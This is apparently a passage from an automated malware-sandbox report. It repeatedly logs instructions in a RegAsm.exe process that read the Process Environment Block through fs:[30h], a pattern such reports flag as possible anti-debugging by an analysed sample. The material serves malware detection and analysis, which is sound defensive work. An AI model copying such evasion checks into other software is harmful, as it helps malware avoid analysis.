        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FA3C0 mov eax, dword ptr fs:[00000030h]5_2_031FA3C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FA3C0 mov eax, dword ptr fs:[00000030h]5_2_031FA3C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F83C0 mov eax, dword ptr fs:[00000030h]5_2_031F83C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F83C0 mov eax, dword ptr fs:[00000030h]5_2_031F83C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F83C0 mov eax, dword ptr fs:[00000030h]5_2_031F83C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F83C0 mov eax, dword ptr fs:[00000030h]5_2_031F83C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AC3CD mov eax, dword ptr fs:[00000030h]5_2_032AC3CD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AB3D0 mov ecx, dword ptr fs:[00000030h]5_2_032AB3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C5227 mov eax, dword ptr fs:[00000030h]5_2_032C5227
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E823B mov eax, dword ptr fs:[00000030h]5_2_031E823B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03227208 mov eax, dword ptr fs:[00000030h]5_2_03227208
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03227208 mov eax, dword ptr fs:[00000030h]5_2_03227208
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BD26B mov eax, dword ptr fs:[00000030h]5_2_032BD26B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BD26B mov eax, dword ptr fs:[00000030h]5_2_032BD26B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F6259 mov eax, dword ptr fs:[00000030h]5_2_031F6259
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EA250 mov eax, dword ptr fs:[00000030h]5_2_031EA250
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03231270 mov eax, dword ptr fs:[00000030h]5_2_03231270
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03231270 mov eax, dword ptr fs:[00000030h]5_2_03231270
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03219274 mov eax, dword ptr fs:[00000030h]5_2_03219274
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9240 mov eax, dword ptr fs:[00000030h]5_2_031E9240
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9240 mov eax, dword ptr fs:[00000030h]5_2_031E9240
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A0274 mov eax, dword ptr fs:[00000030h]5_2_032A0274
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A0274 mov eax, dword ptr fs:[00000030h]5_2_032A0274
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A0274 mov eax, dword ptr fs:[00000030h]5_2_032A0274
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A0274 mov eax, dword ptr fs:[00000030h]5_2_032A0274
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A0274 mov eax, dword ptr fs:[00000030h]5_2_032A0274
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A0274 mov eax, dword ptr fs:[00000030h]5_2_032A0274
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A0274 mov eax, dword ptr fs:[00000030h]5_2_032A0274
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A0274 mov eax, dword ptr fs:[00000030h]5_2_032A0274
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A0274 mov eax, dword ptr fs:[00000030h]5_2_032A0274
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A0274 mov eax, dword ptr fs:[00000030h]5_2_032A0274
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A0274 mov eax, dword ptr fs:[00000030h]5_2_032A0274
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A0274 mov eax, dword ptr fs:[00000030h]5_2_032A0274
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322724D mov eax, dword ptr fs:[00000030h]5_2_0322724D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E826B mov eax, dword ptr fs:[00000030h]5_2_031E826B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AB256 mov eax, dword ptr fs:[00000030h]5_2_032AB256
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AB256 mov eax, dword ptr fs:[00000030h]5_2_032AB256
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F4260 mov eax, dword ptr fs:[00000030h]5_2_031F4260
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F4260 mov eax, dword ptr fs:[00000030h]5_2_031F4260
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F4260 mov eax, dword ptr fs:[00000030h]5_2_031F4260
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032002A0 mov eax, dword ptr fs:[00000030h]5_2_032002A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032002A0 mov eax, dword ptr fs:[00000030h]5_2_032002A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032052A0 mov eax, dword ptr fs:[00000030h]5_2_032052A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032052A0 mov eax, dword ptr fs:[00000030h]5_2_032052A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032052A0 mov eax, dword ptr fs:[00000030h]5_2_032052A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032052A0 mov eax, dword ptr fs:[00000030h]5_2_032052A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032872A0 mov eax, dword ptr fs:[00000030h]5_2_032872A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032872A0 mov eax, dword ptr fs:[00000030h]5_2_032872A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032862A0 mov eax, dword ptr fs:[00000030h]5_2_032862A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032862A0 mov ecx, dword ptr fs:[00000030h]5_2_032862A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032862A0 mov eax, dword ptr fs:[00000030h]5_2_032862A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032862A0 mov eax, dword ptr fs:[00000030h]5_2_032862A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032862A0 mov eax, dword ptr fs:[00000030h]5_2_032862A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032862A0 mov eax, dword ptr fs:[00000030h]5_2_032862A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B92A6 mov eax, dword ptr fs:[00000030h]5_2_032B92A6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B92A6 mov eax, dword ptr fs:[00000030h]5_2_032B92A6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B92A6 mov eax, dword ptr fs:[00000030h]5_2_032B92A6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B92A6 mov eax, dword ptr fs:[00000030h]5_2_032B92A6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032792BC mov eax, dword ptr fs:[00000030h]5_2_032792BC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032792BC mov eax, dword ptr fs:[00000030h]5_2_032792BC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032792BC mov ecx, dword ptr fs:[00000030h]5_2_032792BC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032792BC mov ecx, dword ptr fs:[00000030h]5_2_032792BC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03270283 mov eax, dword ptr fs:[00000030h]5_2_03270283
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03270283 mov eax, dword ptr fs:[00000030h]5_2_03270283
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03270283 mov eax, dword ptr fs:[00000030h]5_2_03270283
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322E284 mov eax, dword ptr fs:[00000030h]5_2_0322E284
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322E284 mov eax, dword ptr fs:[00000030h]5_2_0322E284
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C5283 mov eax, dword ptr fs:[00000030h]5_2_032C5283
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322329E mov eax, dword ptr fs:[00000030h]5_2_0322329E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322329E mov eax, dword ptr fs:[00000030h]5_2_0322329E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032002E1 mov eax, dword ptr fs:[00000030h]5_2_032002E1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032002E1 mov eax, dword ptr fs:[00000030h]5_2_032002E1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032002E1 mov eax, dword ptr fs:[00000030h]5_2_032002E1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A12ED mov eax, dword ptr fs:[00000030h]5_2_032A12ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A12ED mov eax, dword ptr fs:[00000030h]5_2_032A12ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A12ED mov eax, dword ptr fs:[00000030h]5_2_032A12ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A12ED mov eax, dword ptr fs:[00000030h]5_2_032A12ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A12ED mov eax, dword ptr fs:[00000030h]5_2_032A12ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A12ED mov eax, dword ptr fs:[00000030h]5_2_032A12ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A12ED mov eax, dword ptr fs:[00000030h]5_2_032A12ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A12ED mov eax, dword ptr fs:[00000030h]5_2_032A12ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A12ED mov eax, dword ptr fs:[00000030h]5_2_032A12ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A12ED mov eax, dword ptr fs:[00000030h]5_2_032A12ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A12ED mov eax, dword ptr fs:[00000030h]5_2_032A12ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A12ED mov eax, dword ptr fs:[00000030h]5_2_032A12ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A12ED mov eax, dword ptr fs:[00000030h]5_2_032A12ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A12ED mov eax, dword ptr fs:[00000030h]5_2_032A12ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EB2D3 mov eax, dword ptr fs:[00000030h]5_2_031EB2D3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EB2D3 mov eax, dword ptr fs:[00000030h]5_2_031EB2D3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EB2D3 mov eax, dword ptr fs:[00000030h]5_2_031EB2D3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C52E2 mov eax, dword ptr fs:[00000030h]5_2_032C52E2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AF2F8 mov eax, dword ptr fs:[00000030h]5_2_032AF2F8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F92C5 mov eax, dword ptr fs:[00000030h]5_2_031F92C5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F92C5 mov eax, dword ptr fs:[00000030h]5_2_031F92C5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FA2C3 mov eax, dword ptr fs:[00000030h]5_2_031FA2C3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FA2C3 mov eax, dword ptr fs:[00000030h]5_2_031FA2C3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FA2C3 mov eax, dword ptr fs:[00000030h]5_2_031FA2C3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FA2C3 mov eax, dword ptr fs:[00000030h]5_2_031FA2C3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FA2C3 mov eax, dword ptr fs:[00000030h]5_2_031FA2C3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E92FF mov eax, dword ptr fs:[00000030h]5_2_031E92FF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321B2C0 mov eax, dword ptr fs:[00000030h]5_2_0321B2C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321B2C0 mov eax, dword ptr fs:[00000030h]5_2_0321B2C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321B2C0 mov eax, dword ptr fs:[00000030h]5_2_0321B2C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321B2C0 mov eax, dword ptr fs:[00000030h]5_2_0321B2C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321B2C0 mov eax, dword ptr fs:[00000030h]5_2_0321B2C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321B2C0 mov eax, dword ptr fs:[00000030h]5_2_0321B2C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321B2C0 mov eax, dword ptr fs:[00000030h]5_2_0321B2C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321F2D0 mov eax, dword ptr fs:[00000030h]5_2_0321F2D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321F2D0 mov eax, dword ptr fs:[00000030h]5_2_0321F2D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03220124 mov eax, dword ptr fs:[00000030h]5_2_03220124
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EB136 mov eax, dword ptr fs:[00000030h]5_2_031EB136
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EB136 mov eax, dword ptr fs:[00000030h]5_2_031EB136
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EB136 mov eax, dword ptr fs:[00000030h]5_2_031EB136
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EB136 mov eax, dword ptr fs:[00000030h]5_2_031EB136
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F1131 mov eax, dword ptr fs:[00000030h]5_2_031F1131
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F1131 mov eax, dword ptr fs:[00000030h]5_2_031F1131
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329A118 mov ecx, dword ptr fs:[00000030h]5_2_0329A118
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329A118 mov eax, dword ptr fs:[00000030h]5_2_0329A118
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329A118 mov eax, dword ptr fs:[00000030h]5_2_0329A118
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329A118 mov eax, dword ptr fs:[00000030h]5_2_0329A118
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B0115 mov eax, dword ptr fs:[00000030h]5_2_032B0115
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EC156 mov eax, dword ptr fs:[00000030h]5_2_031EC156
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F6154 mov eax, dword ptr fs:[00000030h]5_2_031F6154
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F6154 mov eax, dword ptr fs:[00000030h]5_2_031F6154
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F7152 mov eax, dword ptr fs:[00000030h]5_2_031F7152
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03289179 mov eax, dword ptr fs:[00000030h]5_2_03289179
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9148 mov eax, dword ptr fs:[00000030h]5_2_031E9148
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9148 mov eax, dword ptr fs:[00000030h]5_2_031E9148
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9148 mov eax, dword ptr fs:[00000030h]5_2_031E9148
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9148 mov eax, dword ptr fs:[00000030h]5_2_031E9148
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03284144 mov eax, dword ptr fs:[00000030h]5_2_03284144
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03284144 mov eax, dword ptr fs:[00000030h]5_2_03284144
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03284144 mov ecx, dword ptr fs:[00000030h]5_2_03284144
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03284144 mov eax, dword ptr fs:[00000030h]5_2_03284144
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03284144 mov eax, dword ptr fs:[00000030h]5_2_03284144
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C5152 mov eax, dword ptr fs:[00000030h]5_2_032C5152
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EA197 mov eax, dword ptr fs:[00000030h]5_2_031EA197
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EA197 mov eax, dword ptr fs:[00000030h]5_2_031EA197
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EA197 mov eax, dword ptr fs:[00000030h]5_2_031EA197
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A11A4 mov eax, dword ptr fs:[00000030h]5_2_032A11A4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A11A4 mov eax, dword ptr fs:[00000030h]5_2_032A11A4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A11A4 mov eax, dword ptr fs:[00000030h]5_2_032A11A4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A11A4 mov eax, dword ptr fs:[00000030h]5_2_032A11A4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320B1B0 mov eax, dword ptr fs:[00000030h]5_2_0320B1B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AC188 mov eax, dword ptr fs:[00000030h]5_2_032AC188
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AC188 mov eax, dword ptr fs:[00000030h]5_2_032AC188
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03230185 mov eax, dword ptr fs:[00000030h]5_2_03230185
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327019F mov eax, dword ptr fs:[00000030h]5_2_0327019F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327019F mov eax, dword ptr fs:[00000030h]5_2_0327019F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327019F mov eax, dword ptr fs:[00000030h]5_2_0327019F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327019F mov eax, dword ptr fs:[00000030h]5_2_0327019F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C61E5 mov eax, dword ptr fs:[00000030h]5_2_032C61E5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
